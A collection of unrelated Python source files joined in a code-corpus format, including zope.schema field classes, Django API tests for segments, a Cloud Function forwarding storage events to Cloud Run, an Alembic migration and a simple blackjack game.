       Implement :class:`zope.schema.interfaces.IFromBytes`
    """
    _type = bool
    def _validate(self, value):
        # Convert integers to bools so they don't get mis-flagged
        # by the type check later.
        if isinstance(value, int):
            value = bool(value)
        Field._validate(self, value)
    def set(self, object, value):
        # Coerce ints on assignment too, mirroring _validate.
        if isinstance(value, int):
            value = bool(value)
        Field.set(self, object, value)
    def fromUnicode(self, value):
        """
        >>> from zope.schema._bootstrapfields import Bool
        >>> from zope.schema.interfaces import IFromUnicode
        >>> b = Bool()
        >>> IFromUnicode.providedBy(b)
        True
        >>> b.fromUnicode('True')
        True
        >>> b.fromUnicode('')
        False
        >>> b.fromUnicode('true')
        True
        >>> b.fromUnicode('false') or b.fromUnicode('False')
        False
        >>> b.fromUnicode(u'\u2603')
        False
        """
        # On Python 2, we're relying on the implicit decoding
        # that happens during string comparisons of unicode to native
        # (byte) strings; decoding errors are silently dropped
        v = value == 'True' or value == 'true'
        self.validate(v)
        return v
    def fromBytes(self, value):
        """
        >>> from zope.schema._bootstrapfields import Bool
        >>> from zope.schema.interfaces import IFromBytes
        >>> b = Bool()
        >>> IFromBytes.providedBy(b)
        True
        >>> b.fromBytes(b'True')
        True
        >>> b.fromBytes(b'')
        False
        >>> b.fromBytes(b'true')
        True
        >>> b.fromBytes(b'false') or b.fromBytes(b'False')
        False
        >>> b.fromBytes(u'\u2603'.encode('utf-8'))
        False
        """
        return self.fromUnicode(value.decode("utf-8"))
# Raised by Number.fromUnicode/fromBytes when no converter accepts the string.
class InvalidNumberLiteral(ValueError, ValidationError):
    """Invalid number literal."""
@implementer(IFromUnicode, IFromBytes)
class Number(Orderable, Field):
    """
    A field representing a :class:`numbers.Number` and implementing
    :class:`zope.schema.interfaces.INumber`.
    The :meth:`fromUnicode` method will attempt to use the smallest or
    strictest possible type to represent incoming strings::
        >>> from zope.schema._bootstrapfields import Number
        >>> f = Number()
        >>> f.fromUnicode(u"1")
        1
        >>> f.fromUnicode(u"125.6")
        125.6
        >>> f.fromUnicode(u"1+0j")
        (1+0j)
        >>> f.fromUnicode(u"1/2")
        Fraction(1, 2)
        >>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
        Decimal('234...936')
        >>> f.fromUnicode(u"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    Similarly, :meth:`fromBytes` will do the same for incoming byte strings::
        >>> from zope.schema._bootstrapfields import Number
        >>> f = Number()
        >>> f.fromBytes(b"1")
        1
        >>> f.fromBytes(b"125.6")
        125.6
        >>> f.fromBytes(b"1+0j")
        (1+0j)
        >>> f.fromBytes(b"1/2")
        Fraction(1, 2)
        >>> f.fromBytes((str(2**31234) + '.' + str(2**256)).encode('ascii')) # doctest: +ELLIPSIS
        Decimal('234...936')
        >>> f.fromBytes(b"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    .. versionadded:: 4.6.0
    .. versionchanged:: 4.8.0
       Implement :class:`zope.schema.interfaces.IFromBytes`
    """
    _type = numbers.Number
    # An ordered sequence of conversion routines. These should accept
    # a native string and produce an object that is an instance of `_type`, or raise
    # a ValueError. The order should be most specific/strictest towards least
    # restrictive (in other words, lowest in the numeric tower towards highest).
    # We break this rule with fractions, though: a floating point number is
    # more generally useful and expected than a fraction, so we attempt to parse
    # as a float before a fraction.
    _unicode_converters = (int, float, fractions.Fraction, complex, decimal.Decimal)
    # The type of error we will raise if all conversions fail.
    _validation_error = InvalidNumberLiteral
    def fromUnicode(self, value):
        # Try each converter in order; the first one that parses wins.
        last_exc = None
        for converter in self._unicode_converters:
            try:
                val = converter(value)
                if converter is float and isinf(val) and decimal.Decimal in self._unicode_converters:
                    # Pass this on to decimal, if we're allowed
                    val = decimal.Decimal(value)
            except (ValueError, decimal.InvalidOperation) as e:
                last_exc = e
            else:
                self.validate(val)
                return val
        try:
            raise self._validation_error(*last_exc.args).with_field_and_value(self, value)
        finally:
            # Break the exception/traceback reference cycle.
            last_exc = None
    # On Python 2, native strings are byte strings, which is
    # what the converters expect, so we don't need to do any decoding.
    if PY2:  # pragma: no cover
        fromBytes = fromUnicode
    else:
        def fromBytes(self, value):
            return self.fromUnicode(value.decode('utf-8'))
class Complex(Number):
    """
    A field representing a :class:`numbers.Complex` and implementing
    :class:`zope.schema.interfaces.IComplex`.
    The :meth:`fromUnicode` method is like that for :class:`Number`,
    but doesn't allow Decimals::
        >>> from zope.schema._bootstrapfields import Complex
        >>> f = Complex()
        >>> f.fromUnicode(u"1")
        1
        >>> f.fromUnicode(u"125.6")
        125.6
        >>> f.fromUnicode(u"1+0j")
        (1+0j)
        >>> f.fromUnicode(u"1/2")
        Fraction(1, 2)
        >>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
        inf
        >>> f.fromUnicode(u"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    Similarly for :meth:`fromBytes`:
        >>> from zope.schema._bootstrapfields import Complex
        >>> f = Complex()
        >>> f.fromBytes(b"1")
        1
        >>> f.fromBytes(b"125.6")
        125.6
        >>> f.fromBytes(b"1+0j")
        (1+0j)
        >>> f.fromBytes(b"1/2")
        Fraction(1, 2)
        >>> f.fromBytes((str(2**31234) + '.' + str(2**256)).encode('ascii')) # doctest: +ELLIPSIS
        inf
        >>> f.fromBytes(b"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    .. versionadded:: 4.6.0
    """
    # decimal.Decimal is deliberately absent from the converters here.
    _type = numbers.Complex
    _unicode_converters = (int, float, complex, fractions.Fraction)
class Real(Complex):
    """
    A field representing a :class:`numbers.Real` and implementing
    :class:`zope.schema.interfaces.IReal`.
    The :meth:`fromUnicode` method is like that for :class:`Complex`,
    but doesn't allow Decimals or complex numbers::
        >>> from zope.schema._bootstrapfields import Real
        >>> f = Real()
        >>> f.fromUnicode("1")
        1
        >>> f.fromUnicode("125.6")
        125.6
        >>> f.fromUnicode("1+0j") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Fraction: '1+0j'
        >>> f.fromUnicode("1/2")
        Fraction(1, 2)
        >>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
        inf
        >>> f.fromUnicode("not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    .. versionadded:: 4.6.0
    """
    # complex is dropped from the converters relative to Complex.
    _type = numbers.Real
    _unicode_converters = (int, float, fractions.Fraction)
class Rational(Real):
    """
    A field representing a :class:`numbers.Rational` and implementing
    :class:`zope.schema.interfaces.IRational`.
    The :meth:`fromUnicode` method is like that for :class:`Real`,
    but does not allow arbitrary floating point numbers::
        >>> from zope.schema._bootstrapfields import Rational
        >>> f = Rational()
        >>> f.fromUnicode("1")
        1
        >>> f.fromUnicode("1/2")
        Fraction(1, 2)
        >>> f.fromUnicode("125.6")
        Fraction(628, 5)
        >>> f.fromUnicode("1+0j") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Fraction: '1+0j'
        >>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
        Fraction(777..., 330...)
        >>> f.fromUnicode("not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
    .. versionadded:: 4.6.0
    """
    # float is dropped: decimals parse to exact Fractions instead.
    _type = numbers.Rational
    _unicode_converters = (int, fractions.Fraction)
# Raised by Integral/Int fromUnicode/fromBytes on non-integer input.
class InvalidIntLiteral(ValueError, ValidationError):
    """Invalid int literal."""
class Integral(Rational):
    """
    A field representing a :class:`numbers.Integral` and implementing
    :class:`zope.schema.interfaces.IIntegral`.
    The :meth:`fromUnicode` method only allows integral values::
        >>> from zope.schema._bootstrapfields import Integral
        >>> f = Integral()
        >>> f.fromUnicode("125")
        125
        >>> f.fromUnicode("125.6") #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidIntLiteral: invalid literal for int(): 125.6
    Similarly for :meth:`fromBytes`:
        >>> from zope.schema._bootstrapfields import Integral
        >>> f = Integral()
        >>> f.fromBytes(b"125")
        125
        >>> f.fromBytes(b"125.6") #doctest: +IGNORE_EXCEPTION_DETAIL
        Traceback (most recent call last):
        ...
        InvalidIntLiteral: invalid literal for int(): 125.6
    .. versionadded:: 4.6.0
    """
    _type = numbers.Integral
    _unicode_converters = (int,)
    _validation_error = InvalidIntLiteral
class Int(Integral):
    """A field representing a native integer type and implementing
    :class:`zope.schema.interfaces.IInt`.
    """
    # integer_types is (int, long) on Python 2 and (int,) on Python 3.
    _type = integer_types
    _unicode_converters = (int,)
class _ObjectsBeingValidated(threading.local):
    # Thread-local bookkeeping: the set of id()s of objects currently
    # being validated, used by get_schema_validation_errors to break
    # cycles during recursive schema validation.
    def __init__(self):
        super(_ObjectsBeingValidated, self).__init__()
        self.ids_being_validated = set()
def get_schema_validation_errors(schema, value,
                                 _validating_objects=_ObjectsBeingValidated()):
    """
    Validate that *value* conforms to the schema interface *schema*.
    All :class:`zope.schema.interfaces.IField` members of the *schema*
    are validated after being bound to *value*. (Note that we do not check for
    arbitrary :class:`zope.interface.Attribute` members being present.)
    :return: A `dict` mapping field names to `ValidationError` subclasses.
       A non-empty return value means that validation failed.
    """
    # NOTE: the mutable default argument is deliberate -- it is the
    # shared, thread-local registry of objects being validated.
    errors = {}
    # Interface can be used as schema property for Object fields that plan to
    # hold values of any type.
    # Because Interface does not include any Attribute, it is obviously not
    # worth looping on its methods and filter them all out.
    if schema is Interface:
        return errors
    # if `value` is part of a cyclic graph, we need to break the cycle to avoid
    # infinite recursion. Collect validated objects in a thread local dict by
    # its python representation. A previous version was setting a volatile
    # attribute which didn't work with security proxy
    id_value = id(value)
    ids_being_validated = _validating_objects.ids_being_validated
    if id_value in ids_being_validated:
        return errors
    ids_being_validated.add(id_value)
    # (If we have gotten here, we know that `value` provides an interface
    # other than zope.interface.Interface;
    # iow, we can rely on the fact that it is an instance
    # that supports attribute assignment.)
    try:
        for name in schema.names(all=True):
            attribute = schema[name]
            if IMethod.providedBy(attribute):
                continue  # pragma: no cover
            try:
                if IValidatable.providedBy(attribute):
                    # validate attributes that are fields
                    field_value = getattr(value, name)
                    attribute = attribute.bind(value)
                    attribute.validate(field_value)
            except ValidationError as error:
                errors[name] = error
            except AttributeError as error:
                # property for the given name is not implemented
                errors[name] = SchemaNotFullyImplemented(error).with_field_and_value(attribute, None)
    finally:
        # Always unregister this object, even if validation raised.
        ids_being_validated.remove(id_value)
    return errors
def get_validation_errors(schema, value, validate_invariants=True):
    """
    Validate that *value* conforms to the schema interface *schema*.
    This includes checking for any schema validation errors (using
    `get_schema_validation_errors`). If that succeeds, and
    *validate_invariants* is true, then we proceed to check for any
    declared invariants.
    Note that this does not include a check to see if the *value*
    actually provides the given *schema*.
    :return: If there were any validation errors, either schema or
        invariant, return a two tuple (schema_error_dict,
        invariant_error_list). If there were no errors, returns a
        two-tuple where both members are empty.
    """
    schema_error_dict = get_schema_validation_errors(schema, value)
    invariant_errors = []
    # Only validate invariants if there were no previous errors. Previous
    # errors could be missing attributes which would most likely make an
    # invariant raise an AttributeError.
    if validate_invariants and not schema_error_dict:
        try:
            schema.validateInvariants(value, invariant_errors)
        except Invalid:
            # validateInvariants raises a wrapper error around
            # all the errors it got if it got errors, in addition
            # to appending them to the errors list. We don't want
            # that, we raise our own error.
            pass
    return (schema_error_dict, invariant_errors)
class Object(Field):
    """
    Implementation of :class:`zope.schema.interfaces.IObject`.
    """
    # Subclasses may predefine the schema; the constructor then allows
    # omitting the *schema* argument.
    schema = None
    def __init__(self, schema=_NotGiven, **kw):
        """
        Object(schema=<Not Given>, *, validate_invariants=True, **kwargs)
        Create an `~.IObject` field. The keyword arguments are as for `~.Field`.
        .. versionchanged:: 4.6.0
           Add the keyword argument *validate_invariants*. When true (the default),
           the schema's ``validateInvariants`` method will be invoked to check
           the ``@invariant`` properties of the schema.
        .. versionchanged:: 4.6.0
           The *schema* argument can be ommitted in a subclass
           that specifies a ``schema`` attribute.
        """
        if schema is _NotGiven:
            schema = self.schema
        if not IInterface.providedBy(schema):
            # Note that we don't provide 'self' as the 'field'
            # by calling with_field_and_value(): We're not fully constructed,
            # we don't want this instance to escape.
            raise NotAnInterface(schema, self.__name__)
        self.schema = schema
        self.validate_invariants = kw.pop('validate_invariants', True)
        super(Object, self).__init__(**kw)
    def getExtraDocLines(self):
        # Document which interface values of this field must provide.
        lines = super(Object, self).getExtraDocLines()
        lines.append(_DocStringHelpers.make_class_field("Must Provide", self.schema))
        return lines
    def _validate(self, value):
        super(Object, self)._validate(value)
        # schema has to be provided by value
        if not self.schema.providedBy(value):
            raise SchemaNotProvided(self.schema, value).with_field_and_value(self, value)
        # check the value against schema
        schema_error_dict, invariant_errors = get_validation_errors(
            self.schema,
            value,
            self.validate_invariants
        )
        if schema_error_dict or invariant_errors:
            errors = list(schema_error_dict.values()) + invariant_errors
            exception = SchemaNotCorrectlyImplemented(
                errors,
                self.__name__,
                schema_error_dict,
                invariant_errors
            ).with_field_and_value(self, value)
            try:
                raise exception
            finally:
                # Break cycles
                del exception
                del invariant_errors
                del schema_error_dict
                del errors
    def set(self, object, value):
        # Announce that we're going to assign the value to the object.
        # Motivation: Widgets typically like to take care of policy-specific
        # actions, like establishing location.
        event = BeforeObjectAssignedEvent(value, self.__name__, object)
        notify(event)
        # The event subscribers are allowed to replace the object, thus we need
        # to replace our previous value.
        value = event.object
        super(Object, self).set(object, value)
@implementer(IBeforeObjectAssignedEvent)
class BeforeObjectAssignedEvent(object):
    """An object is going to be assigned to an attribute on another object."""
    def __init__(self, object, name, context):
        self.object = object    # the value about to be assigned
        self.name = name        # the attribute name being assigned
        self.context = context  # the object receiving the assignment
| StarcoderdataPython |
11394303 | import json
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from audit.models import AuditLog, RelatedObjectType
from environments.identities.models import Identity
from environments.identities.traits.models import Trait
from environments.models import STRING, Environment
from organisations.models import Organisation, OrganisationRole
from projects.models import Project
from segments.models import EQUAL, Condition, Segment, SegmentRule
# Resolve the active user model once at import time (honours a custom
# AUTH_USER_MODEL setting).
User = get_user_model()
class SegmentViewSetTestCase(APITestCase):
    """API tests for the project-scoped segment endpoints: audit-log
    creation, identity filtering and rule validation."""
    def setUp(self) -> None:
        # Authenticate as an organisation admin against a fresh project.
        self.user = User.objects.create(email="<EMAIL>")
        self.organisation = Organisation.objects.create(name="Test Organisation")
        self.user.add_organisation(self.organisation, OrganisationRole.ADMIN)
        self.client.force_authenticate(self.user)
        self.project = Project.objects.create(
            name="Test project", organisation=self.organisation
        )
    def tearDown(self) -> None:
        # Audit log entries are created as side effects; clear them so
        # per-test counts stay meaningful.
        AuditLog.objects.all().delete()
    def test_audit_log_created_when_segment_created(self):
        # Given
        url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
        data = {
            "name": "Test Segment",
            "project": self.project.id,
            "rules": [{"type": "ALL", "rules": [], "conditions": []}],
        }
        # When
        res = self.client.post(
            url, data=json.dumps(data), content_type="application/json"
        )
        # Then
        assert res.status_code == status.HTTP_201_CREATED
        assert (
            AuditLog.objects.filter(
                related_object_type=RelatedObjectType.SEGMENT.name
            ).count()
            == 1
        )
    def test_audit_log_created_when_segment_updated(self):
        # Given
        segment = Segment.objects.create(name="Test segment", project=self.project)
        url = reverse(
            "api-v1:projects:project-segments-detail",
            args=[self.project.id, segment.id],
        )
        data = {
            "name": "New segment name",
            "project": self.project.id,
            "rules": [{"type": "ALL", "rules": [], "conditions": []}],
        }
        # When
        res = self.client.put(
            url, data=json.dumps(data), content_type="application/json"
        )
        # Then
        assert res.status_code == status.HTTP_200_OK
        assert (
            AuditLog.objects.filter(
                related_object_type=RelatedObjectType.SEGMENT.name
            ).count()
            == 1
        )
    def test_can_filter_by_identity_to_get_only_matching_segments(self):
        # Given
        trait_key = "trait_key"
        trait_value = "trait_value"
        # A segment whose single ALL rule matches the identity's trait...
        matching_segment = Segment.objects.create(
            name="Matching segment", project=self.project
        )
        matching_rule = SegmentRule.objects.create(
            segment=matching_segment, type=SegmentRule.ALL_RULE
        )
        Condition.objects.create(
            rule=matching_rule, property=trait_key, operator=EQUAL, value=trait_value
        )
        # ...and one with no rules that should be filtered out.
        Segment.objects.create(name="Non matching segment", project=self.project)
        environment = Environment.objects.create(
            name="Test environment", project=self.project
        )
        identity = Identity.objects.create(
            identifier="test-user", environment=environment
        )
        Trait.objects.create(
            identity=identity,
            trait_key=trait_key,
            value_type=STRING,
            string_value=trait_value,
        )
        base_url = reverse(
            "api-v1:projects:project-segments-list", args=[self.project.id]
        )
        url = base_url + "?identity=%d" % identity.id
        # When
        res = self.client.get(url)
        # Then
        assert res.json().get("count") == 1
    def test_cannot_create_segments_without_rules(self):
        # Given
        url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
        data = {"name": "New segment name", "project": self.project.id, "rules": []}
        # When
        res = self.client.post(
            url, data=json.dumps(data), content_type="application/json"
        )
        # Then
        assert res.status_code == status.HTTP_400_BAD_REQUEST
    def test_can_create_segments_with_boolean_condition(self):
        # Given
        url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
        data = {
            "name": "New segment name",
            "project": self.project.id,
            "rules": [
                {
                    "type": "ALL",
                    "rules": [],
                    "conditions": [
                        {"operator": EQUAL, "property": "test-property", "value": True}
                    ],
                }
            ],
        }
        # When
        res = self.client.post(
            url, data=json.dumps(data), content_type="application/json"
        )
        # Then
        assert res.status_code == status.HTTP_201_CREATED
| StarcoderdataPython |
170329 | <filename>projeto_05.py
# Interactive feedback script: collects an optional free-text comment
# and an optional 0-5 star rating from the user, storing both in ``dic``.
dic = {}
# --- Optional free-text comment ---------------------------------------
# Keep asking until the user answers N; each S lets the user leave
# (and overwrite) a comment.
while True:
    try:
        perg = str(input('Deseja fazer um comentário ? [S/N] ')).strip().upper()[0]
    except IndexError:
        # Empty answer used to crash with an uncaught IndexError; re-ask.
        print('Resposta incorreta')
        continue
    if perg == 'S':
        dic['coment'] = str(input('Qual o seu comentário ? ')).strip().upper()
        print('Obrigado pelo seu comentário')
    elif perg == 'N':
        print('Até mais !')
        break
    else:
        print('Resposta incorreta')
# --- Optional star rating ----------------------------------------------
while True:
    try:
        perg_1 = str(input('Deseja avaliar em estrelas ? [S/N]')).upper().strip()[0]
    except IndexError:
        # Empty answer: re-ask instead of crashing.
        print('Resposta Incorreta')
        continue
    if perg_1 == 'S':
        # Keep asking until a valid integer in [0, 5] is given.
        while True:
            try:
                dic['estrelas'] = int(input('Quantas estrelas você avalia para o nosso serviço ? [0 - 5]'))
            except ValueError:
                print('Resposta Incorreta')
                continue
            # Original code only checked <= 5, silently accepting
            # negative ratings; enforce the advertised 0-5 range.
            if 0 <= dic['estrelas'] <= 5:
                print('Muito obrigado pela sua resposta !')
                break
            print('Resposta Incorreta')
        break
    elif perg_1 == 'N':
        print('Até mais !')
        break
    else:
        # Invalid S/N answer previously terminated the program; re-ask.
        print('Resposta Incorreta')
| StarcoderdataPython |
"""Converts .md files to Unix man files using pandoc and Seamless
TODO: Store as a single Seamless graph, as soon as Seamless has map-reduce
"""
docdir = ".."
buffer_cache = "seamless-buffer-cache.zip"   # zip of cached cell buffers
result_cache = "seamless-result-cache.dat"   # transformation -> result checksum pairs
import glob, os
from seamless.highlevel import Context, Transformer, Cell
import seamless
# Collect the basenames (without extension) of all Markdown docs.
docfiles0 = glob.glob("{}/*.md".format(docdir))
docfiles = [os.path.splitext(
    os.path.split(f)[1]
)[0] for f in docfiles0]
# TODO: make a real API for this
from seamless.core.cache.transformation_cache import transformation_cache
# Pre-seed the transformation cache from the on-disk result cache so
# unchanged documents are not re-converted.
if os.path.exists(result_cache):
    with open(result_cache) as f:
        for line in f:
            tf_checksum, result_checksum = line.split()
            tf_checksum = bytes.fromhex(tf_checksum)
            result_checksum = bytes.fromhex(result_checksum)
            transformation_cache.transformation_results[tf_checksum] = \
                result_checksum, False
# /TODO
ctx = Context()
if os.path.exists(buffer_cache):
    ctx.add_zip(buffer_cache)
# Bash transformer code: pandoc converts one Markdown file to a man page.
ctx.pandoc = """
ln -s inputfile input.md
pandoc --standalone --to man input.md -o /dev/stdout
"""
# One sub-context per document: markdown cell -> pandoc transformer ->
# result cell mounted as build/<name>.1.
for f in docfiles:
    setattr(ctx, f, Context())
    sctx = getattr(ctx, f)
    md = "{}/{}.md".format(docdir, f)
    sctx.md = Cell("text").set(open(md).read())
    tf = sctx.tf = Transformer()
    tf.language = "bash"
    tf.scriptname = f
    tf.inputfile = sctx.md
    tf.code = ctx.pandoc
    sctx.result = tf
    sctx.result.celltype = "text"
    sctx.result.mount("build/{}.1".format(f), "w")
ctx.compute()
ctx.save_zip(buffer_cache)
# TODO: make a real API for this
from seamless.core.cache.transformation_cache import transformation_cache
# Persist all non-preliminary transformation results for the next run.
# NOTE(review): the file handle below shadows the ``result_cache``
# filename constant defined at the top; harmless here, but confusing.
with open(result_cache, "w") as result_cache:
    for tf_checksum, (result_checksum, prelim) in sorted(
        transformation_cache.transformation_results.items()
    ):
        if not prelim:
            print(
                tf_checksum.hex(),
                result_checksum.hex(),
                file=result_cache
            )
# / TODO | StarcoderdataPython |
8171366 | # Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import os
def handle_newfile(data, context):
    """Background Cloud Function triggered by Cloud Storage.

    Forwards the bucket and object name of a newly created file to a
    Cloud Run endpoint (read from the DESTINATION_URL environment
    variable), authenticating service-to-service with an identity token
    fetched from the GCE metadata server.

    Args:
        data (dict): The Cloud Functions event payload.
        context (google.cloud.functions.Context): Metadata of triggering event.
    Returns:
        bool: True when Cloud Run answered 200 OK; the output is written
        to Stackdriver Logging.
    """
    # Receiving service URL (Cloud Run endpoint).
    url = os.environ.get('DESTINATION_URL', "No DESTINATION_URL")

    payload = {
        'bucket': data['bucket'],
        'filename': data['name']
    }

    # Notes:
    # (1) Ideally, we can simply invoke mlp_babyweight.finetune from here
    # However, kfp.Client() has dependencies on binaries that are not available in Cloud Functions
    # Hence, this workaround of putting mlp_babyweight.py in a Docker container and invoking it
    # via Cloud Run
    # (2) We could reduce the traffic to Cloud Run by checking filename pattern here
    # but for reusability and maintainability reasons, I'm keeping this
    # Cloud Function as a simple pass-through
    print("Invoking Cloud Run at {} with {}".format(url, payload))

    # Fetch an identity token for the target audience from the metadata server.
    # See https://cloud.google.com/run/docs/authenticating/service-to-service
    metadata_server_token_url = 'http://metadata/computeMetadata/v1/instance/service-accounts/default/identity?audience='
    token_response = requests.get(
        metadata_server_token_url + url,
        headers={'Metadata-Flavor': 'Google'})
    jwt = token_response.content.decode("utf-8")

    # Provide the token in the request to the receiving service.
    headers = {
        'Authorization': f'bearer {jwt}',
        'Content-Type': 'application/json'
    }
    print("Headers = {}".format(headers))

    resp = requests.post(url, data=json.dumps(payload), headers=headers)
    return resp.status_code == requests.codes.ok
| StarcoderdataPython |
1989227 | <gh_stars>0
# -*- coding:utf-8 -*-
def hex_value(hex_byte: int) -> int:
    """Return the numeric value (0-15) of an ASCII hexadecimal digit byte.

    Args:
        hex_byte: The int code of an ASCII character '0'-'9', 'A'-'F'
            or 'a'-'f'.

    Returns:
        0-9 for digits '0'-'9', 10-15 for 'A'-'F' / 'a'-'f'.

    Raises:
        TypeError: if ``hex_byte`` is not an int.
        ValueError: if ``hex_byte`` is not an ASCII hex digit.
    """
    if type(hex_byte) is not int:
        # BUG FIX: the original message was truncated ("hex_byte must be in").
        raise TypeError("hex_byte must be an int")
    if hex_byte in range(0x30, 0x3a):       # '0'-'9'
        return hex_byte - 0x30
    # BUG FIX: letters must map to 10-15 (the original returned 0-5), and
    # only A-F / a-f are valid hex digits (the original accepted A-Z / a-z).
    if hex_byte in range(0x41, 0x47):       # 'A'-'F'
        return hex_byte - 0x41 + 10
    if hex_byte in range(0x61, 0x67):       # 'a'-'f'
        return hex_byte - 0x61 + 10
    raise ValueError(("hex byte must be in"
                      " range(0x30, 0x3a)"   # 0-9
                      " or range(0x41, 0x47)"  # A-F
                      " or range(0x61, 0x67)"  # a-f
                      ))
if __name__ == '__main__':
    # Demo: 0x29 (')') is not a hex digit, so hex_value raises ValueError.
    try:
        result = hex_value(0x29)
        print(result)
    except Exception as err:
        print(err)
    finally:
        print("---")
| StarcoderdataPython |
3250290 | """Add 'wiki' field to Person table
Revision ID: 3aecd12384ee
Revises: <PASSWORD>
Create Date: 2013-08-19 16:33:39.723178
"""
# revision identifiers, used by Alembic.
revision = '3aecd12384ee'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
    # Forward migration: add the nullable free-text 'wiki' column to 'person'.
    op.add_column('person', sa.Column('wiki', sa.Text(), nullable=True))
def downgrade():
    # Reverse migration: drop the 'wiki' column again (data is lost).
    op.drop_column('person', 'wiki')
| StarcoderdataPython |
3523999 | # CLASSES
#from random import*
import random
class deck:
def __init__(self):
self.deck=[[1,2,3,4,5,6,7,8,9,10,11,12,13],['Spades','Clubs','Hearts','Diamonds']]
self.names={1:'Ace', 2:'Two', 3:'Three', 4:'Four', 5:'Five', 6:'Six', 7:'Seven', 8:'Eight', 9:'Nine', 10:'Ten', 11:'Jack', 12:'Queen', 13:'King'}
def randomgroup(self):
return self.deck[1][random.randint(0,3)]
def randomface(self):
return self.deck[0][random.randint(0,12)]
# Inheritance to be used //////////////////////////////////////
class player:
    """Tracks the human player's chips, bet and current hand."""
    def __init__(self, funds=100):
        self.myfunds = funds   # chips available
        self.cards = []        # printable card names in hand
        self.bet = 0           # amount currently wagered
        self.val = 0           # blackjack value of the hand
        self.busts = False     # True once the hand exceeded 21
        self.aces = 0          # aces still counted as 11
    def __str__(self):
        return 'Player'
    def _reset_hand(self):
        # Common end-of-round cleanup: clear bet, value, aces and cards.
        self.bet = 0
        self.val = 0
        self.aces = 0
        self.cards.clear()
    def blackjack(self):
        """Pay out a natural blackjack at 3:2 and reset the hand."""
        print('Fantastic! You won through BlackJack! :-)')
        self.bet = self.bet + self.bet * 1.5
        self.myfunds += self.bet
        self._reset_hand()
    def win(self):
        """Pay out a regular win at 1:1 and reset the hand."""
        print('You won the game.Cool!')
        self.bet *= 2
        self.myfunds += self.bet
        self._reset_hand()
    def bust(self):
        """Forfeit the bet and mark the player as busted."""
        print('You are busted.')
        self._reset_hand()
        self.busts = True
    def lose(self):
        """Forfeit the bet quietly and clear the busted flag."""
        self._reset_hand()
        self.busts = False
class dealer:
    """Tracks the house's hand, including the face-down hole card."""
    def __init__(self):
        self.cards = []        # printable card names in hand
        self.val = 0           # blackjack value of the hand
        self.hiddencard = ''   # real name of the face-down card, if any
        self.busts = False     # True once the hand exceeded 21
        self.aces = 0          # aces still counted as 11
    def _reset_hand(self):
        # Common end-of-round cleanup: clear value, aces and cards.
        self.val = 0
        self.aces = 0
        self.cards.clear()
    def hidecard(self):
        """Replace the second card with a face-down placeholder."""
        if not self.cards:
            print('No card to hide')
            return
        self.hiddencard = self.cards[1]
        self.cards[1] = 'Card Faced down'
    def revealcard(self):
        """Restore the face-down card to its real name."""
        if not self.cards:
            print('No card to reveal')
            return
        self.cards[1] = self.hiddencard
        self.hiddencard = ''
    def __str__(self):
        return 'Dealer'
    def win(self):
        """Announce the house win and reset the hand."""
        print('Dealer won the game.Better luck next time!:-(')
        self._reset_hand()
    def bust(self):
        """Mark the dealer as busted and reset the hand."""
        print('Dealer is busted.')
        self._reset_hand()
        self.busts = True
    def lose(self):
        """Reset the hand quietly and clear the busted flag."""
        self._reset_hand()
        self.busts = False
# GAMEPLAY
# Module-level game state shared (via ``global``) by the functions below.
deck1=deck()      # the card source
player1=player()  # the human player (starts with 100 chips)
dealer1=dealer()  # the house
gc=False          # "game concluded" flag for the current round
#Definitions
def new_card(group,face,pcards,p):
    """Deal the card (face, group) into hand list ``pcards`` and update the
    hand value of player/dealer ``p``; aces count 11 until the hand busts."""
    pcards.append(f"{deck1.names[face]} of {group}")
    if face==1:
        p.aces+=1
    p.val+=val_count(face)
    # Demote aces from 11 to 1 while the hand is over 21.
    while p.val>21 and p.aces:
        p.val-=10
        p.aces-=1
def val_count(f_card):
    """Return the blackjack value of a card face (1=Ace .. 13=King).

    Aces are initially worth 11 (new_card later demotes them to 1 if the
    hand would bust); 2-10 score face value; Jack/Queen/King score 10.

    Raises:
        ValueError: if ``f_card`` is not in 1..13.  (The original silently
        returned None for invalid faces, which would corrupt the hand
        value downstream.)
    """
    if f_card == 1:           # Ace
        return 11
    if 2 <= f_card <= 10:     # number cards
        return f_card
    if 11 <= f_card <= 13:    # Jack / Queen / King
        return 10
    raise ValueError(f"invalid card face: {f_card!r}")
def printcards(a):
    """Print the hand and current value of a player/dealer object ``a``."""
